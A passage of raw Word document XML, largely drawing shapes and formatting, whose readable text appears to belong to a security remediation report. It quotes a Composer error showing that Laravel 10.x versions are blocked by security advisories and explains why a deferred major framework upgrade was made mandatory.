ZXjDG977pljOthMjDb51rCFZKBDElTMt1xq+dm8P&#10;zyB8QDbYOSYNZ/KwLG9vCsyNm/iTxm2oRQxhn6OGJoQ+l9JXDVn0C9cTR+/gBoshrkMtzYBTDLed&#10;TJV6khZbjg0N9rRuqDpuT1bD+4TT6jF5HTfHw/r8s8s+vjcJaX1/N69eQASaw/8xXPAjOpSRae9O&#10;bLzoNMRHwt+8eCpVGYh9VEmagSwLeY1f/gIAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADh&#10;AQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4&#10;/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBL&#10;4ghpiAQAAOQPAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQBktl0a3AAAAAYBAAAPAAAAAAAAAAAAAAAAAOIGAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAA6wcAAAAA&#10;">
                <v:shape id="Shape 1433" o:spid="_x0000_s1187" style="position:absolute;width:64801;height:7143;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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wWwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hBG81ay21bI0ipYUcROqDnofNuLt0MwmbuLv++0YQvM3H95zlerCN6KgNtWMFs2kGgrhw&#10;puZSwen4/fwOIkRkg41jUnClAOvV6GmJuXE976k7xFKkEA45Kqhi9LmUoajIYpg6T5y4s2stxgTb&#10;UpoW+xRuG/mSZW/SYs2poUJPnxUVf4eLVdD97rZZE87aL7aLXmuvL18/WqnJeNh8gIg0xIf47tYm&#10;zX+dz+H2TTpBrv4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAIRcFsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1439l6480126,5021r,704319l6474764,712912v-2334,967,-4763,1451,-7290,1463l19050,714375v-2526,-12,-4956,-496,-7290,-1463c9426,711944,7366,710568,5580,708794,3793,706996,2417,704943,1450,702605l,695325,,19050,1450,11745c2417,9413,3793,7348,5580,5569,7366,3783,9426,2406,11760,1439,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,714375"/>
                </v:shape>
                <v:rect id="Rectangle 1598" o:spid="_x0000_s1188" style="position:absolute;left:1007;top:1550;width:4273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4CDBD7E1" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Root </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>composer.json</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> requires </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>laravel</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>/framework ^10.10, found</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1599" o:spid="_x0000_s1189" style="position:absolute;left:1007;top:3264;width:4418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28F5B86B" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>laravel</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>/</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>framework[</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>v10.10.0, ..., v10.50.3] but these were not</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1600" o:spid="_x0000_s1190" style="position:absolute;left:1007;top:4979;width:4056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75B0A700" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>loaded, because they are affected by security advisories</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="37594477" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">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There is therefore no "pin to the latest 10.x patch" option. Our plan had listed the major upgrade as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>deferred</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; the evidence made it mandatory, and we promoted it to a fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A46C35" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="12"/>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w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251927552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56FD3FCC" wp14:editId="4C8548E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3199506</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-9414</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28787" name="Group 28787"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1608" name="Shape 1608"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281101" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281101" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225"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580D598" id="Group 28787" o:spid="_x0000_s1026" style="position:absolute;margin-left:251.95pt;margin-top:-.75pt;width:22.5pt;height:10.5pt;z-index:-251388928" coordsize="2857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&#10;">
                <v:shape id="Shape 1608" o:spid="_x0000_s1027" style="position:absolute;width:285750;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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ESxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;EMXvBb/DMoK3urGCSHQVEaT1UPHvfciOSTA7G3a3Jn77zqHQ2wzvzXu/Wa5716gnhVh7NjAZZ6CI&#10;C29rLg1cL7v3OaiYkC02nsnAiyKsV4O3JebWd3yi5zmVSkI45migSqnNtY5FRQ7j2LfEot19cJhk&#10;DaW2ATsJd43+yLKZdlizNFTY0rai4nH+cQZsV07TZzjc+GSv+8N38zpO7daY0bDfLEAl6tO/+e/6&#10;ywr+LBNc+UZG0KtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEL6kRLEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l276225,v2630,,4876,930,6735,2778c284820,4638,285750,6890,285750,9525r,114300c285750,126454,284820,128699,282960,130559v-1859,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,28575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8576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3049BC6D" wp14:editId="17CE6F87">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1438275" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28788" name="Group 28788"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1438275" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1438275" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1612" name="Shape 1612"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="809625" y="0"/>
                            <a:ext cx="628650" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="628650" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="619125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="621755" y="0"/>
                                  <a:pt x="624000" y="930"/>
                                  <a:pt x="625860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="627720" y="4651"/>
                                  <a:pt x="628650" y="6890"/>
                                  <a:pt x="628650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="628650" y="126448"/>
                                  <a:pt x="627720" y="128687"/>
                                  <a:pt x="625860" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="624000" y="132407"/>
                                  <a:pt x="621755" y="133338"/>
                                  <a:pt x="61912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18" name="Shape 1618"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4638"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128699"/>
                                  <a:pt x="635385" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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58A51D82" id="Group 28788" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:12.75pt;width:113.25pt;height:24pt;z-index:-251387904" coordsize="14382,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&#10;di54bWxQSwUGAAAAAAQABADzAAAAwQcAAAAA&#10;">
                <v:shape id="Shape 1612" o:spid="_x0000_s1027" style="position:absolute;left:8096;width:6286;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="628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6cwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89a8Mw&#10;EN0L/Q/iAtka2R5CcaKEEAh0KAUlXbod1sVya52MdXXcfx8VCt3u8T5vu59DryYaUxfZQLkqQBE3&#10;0XXcGni/nJ6eQSVBdthHJgM/lGC/e3zYYu3ijS1NZ2lVDuFUowEvMtRap8ZTwLSKA3HmrnEMKBmO&#10;rXYj3nJ46HVVFGsdsOPc4HGgo6fm6/wdDFxe+WCl+vTu7SjWXj/6yZalMcvFfNiAEprlX/znfnF5&#10;/rqs4PebfILe3QEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC1+06cwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l619125,v2630,,4875,930,6735,2791c627720,4651,628650,6890,628650,9525r,114300c628650,126448,627720,128687,625860,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,628650,133350"/>
                </v:shape>
                <v:shape id="Shape 1618" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:6381;height:1334;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7J9xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvhX6HMEJvNauIyGoUESxeCtY/93EzbhY3kyWJuv32nYPQ2wzvzXu/Wax636oHxdQENjAaFqCI&#10;q2Abrg2cjtvPGaiUkS22gcnALyVYLd/fFlja8OQfehxyrSSEU4kGXM5dqXWqHHlMw9ARi3YN0WOW&#10;NdbaRnxKuG/1uCim2mPD0uCwo42j6na4ewPF7utiaXueHNeTFN1sHO7f+2DMx6Bfz0Fl6vO/+XW9&#10;s4I/HQmufCMj6OUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC67sn3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" 